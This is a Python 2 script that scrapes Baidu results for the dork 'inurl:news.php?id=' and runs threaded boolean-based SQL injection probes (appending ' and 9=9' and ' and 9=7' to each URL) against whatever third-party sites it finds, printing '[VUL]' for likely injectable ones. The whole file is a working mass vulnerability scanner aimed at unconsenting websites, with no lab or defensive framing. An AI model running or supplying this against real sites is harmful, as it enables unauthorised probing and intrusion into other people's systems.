#coding:utf-8
#https://www.baidu.com/s?wd=inurl%3Aphp&rsv_spt=1&rsv_iqid=0x9fc604c00000b964&issp=1&f=8&rsv_bp=1&rsv_idx=2&ie=utf-8&rqlang=cn&tn=baiduhome_pg&rsv_enter=1&oq=inurl%253A%2520php&rsv_t=2ea6WoxyzOEoJeLHJ3sd12REg1JCT0qR111yNAZbaSl8FRsB8UEv8sb%2BwNX1piedZyhw&inputT=783&rsv_pq=eedda3e10000bc39&rsv_sug3=28&rsv_sug2=0&rsv_sug4=1638

import requests as rqst
from bs4 import BeautifulSoup
from threading import Thread
import Queue
import time

# Shared FIFO handing candidate URLs from the search/crawl phase (main thread)
# to the scanner worker threads in scn().
q = Queue.Queue()

def srch(wd, pn):
	"""Fetch one page of Baidu search results.

	wd -- the search keyword / dork string
	pn -- 1-based result page number (Baidu's pn parameter counts results,
	      so page pn starts at offset (pn-1)*10)

	Returns the raw response body (bytes).
	"""
	offset = (pn - 1) * 10
	target = "http://www.baidu.com/s?wd=" + wd + "&pn=" + str(offset)
	response = rqst.get(target)
	return response.content


def psrHtml(html):
	"""Extract Baidu click-redirector links from a result page.

	Parses *html* and returns the set of <a href> values that point at
	Baidu's redirector (http://www.baidu.com/link?url=...), i.e. the
	actual search hits rather than navigation links.
	"""
	links = set()
	soup = BeautifulSoup(html, "lxml")
	for anchor in soup.find_all("a"):  # every <a> tag on the page
		href = anchor.get("href")
		# get() returns None when the tag has no href attribute; the old
		# code hid that behind a broad try/except -- test it explicitly.
		if href and href.find("http://www.baidu.com/link?url=") != -1:
			links.add(href)
	return links


def alyUrl2Queue(url_set):
	# tmp = set()
	for i in url_set:
		try:
			rp = rqst.get(i)
		except Exception as e:
			continue
		url = rp.url
		if url.find("baidu.com") != -1:
			continue
		print "[*]"+url
		q.put(url)
	# return tmp

def startIface(wd, pn):
	print "[INFO]Start search..."
	h = srch(wd, pn)
	ls = psrHtml(h)
	alyUrl2Queue(ls)


def scn():
	time.sleep(0.5)
	print "[THREAD]Scan thread is running..."
	while 1:
		time.sleep(0.5)
		# print "while"
		curl = q.get()
		payloads = {
		"src":curl,
		"bool_true":curl+" and 9=9",
		"bool_false":curl+" and 9=7"
		}

		print "[SCAN]" + curl
		try:
			r_src = rqst.get(payloads["src"]).headers["Content-Length"]
			r_true = rqst.get(payloads["bool_true"]).headers["Content-Length"]
			r_false = rqst.get(payloads["bool_false"]).headers["Content-Length"]
		except:
			continue

		if r_src == r_true:
			if r_true != r_false:
				print "[VUL]" + curl


if __name__ == '__main__':
        
	for i in range(10):
		t = Thread(target=scn)
		t.start()

	for x in range(1, 20):
		startIface("inurl:news.php?id=", x)
	print "...end"
